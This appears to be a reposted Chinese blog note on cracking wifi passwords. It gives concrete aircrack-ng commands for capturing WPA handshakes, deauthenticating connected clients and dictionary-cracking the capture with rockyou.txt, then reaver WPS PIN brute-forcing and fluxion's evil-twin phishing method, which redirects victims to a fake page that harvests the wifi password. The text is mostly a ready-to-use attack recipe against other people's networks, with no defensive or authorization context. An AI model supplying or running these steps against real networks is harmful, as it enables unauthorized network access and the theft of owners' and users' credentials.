admin管理员组文章数量:1620370
破解wifi密码笔记
相关指令:
-
终端输入ifconfig,查看网卡。
-
airmon-ng start wlan0:把外置网卡变成监听模式,无线接口wlan0会变成wlan0mon。
-
airodump-ng wlan0mon,扫描附近的wifi。
-
airmon-ng stop 网卡号 :把网卡转为正常状态
-
抓取握手包:airodump-ng -c 1 --bssid DC:FE:18:53:81:C9 -w hack wlan0mon( -c 指定信道,-bssid指定目标路由器的BBSID,-w指定抓取的数据包保存的目录。)
-
aireplay-ng -0 2 -a 连接设备的BSSID值 -c 连接设备的STATION值 wlan0mon:强制连接到wifi的设备重连路由器,以便快速抓包。(-a指定wifi热点的BSSID,-c指定要攻击设备的MAC地址。
-
**破解密码代码:aircrack-ng -a2 -b MAC地址 -w /usr/share/wordlist/rockyou.txt ~/*.cap **
1.利用reaver破解
-
**wash -i wlan0mon:**直接扫描开启wps的路由器,(WPS Locked为No的就是开启wps服务的路由器,都可以尝试攻击。
-
reaver -i wlan0mon -b Mac地址 -vv ,用reaver命令傻瓜式破解指令
若成功破解出Ping码,记好,若对面改了密码,但没改ping码的话,用reaver会一下子得到密码。reaver -i 网卡 -b WIFIMAC -p ping码 -vv
2.利用fluxion
工作原理:(大体步骤)
-
扫描能够接收到的wifi信号
-
抓取握手包(主要目的是为了验证wifi密码是否正确)
-
使用web接口
-
启动一个假的AP实例来模拟原本的接入点
-
然后会生成一个MDK3进程。如果普通用户已经连接到这个wifi,也会输入Wifi密码
-
随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,并且会把这些请求重新定向到一个含有恶意脚本的HOST地址
-
随后会弹出一个窗口提示用户输入正确的Wifi密码
-
用户输入的密码将和第二步抓到的握手包作比较来核实密码是否正确。
-
这个程序自动化运行
下载完fluxion,运行./fluxion
在fluxion里面有个脚本会自动检测所缺少的插件:./Insrall.sh
3.暴力破解
Kali linux本身有默认的字典文件,位置在/usr/share/wordlists。
版权声明:本文标题:破解wifi笔记 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1728817223a1175088.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论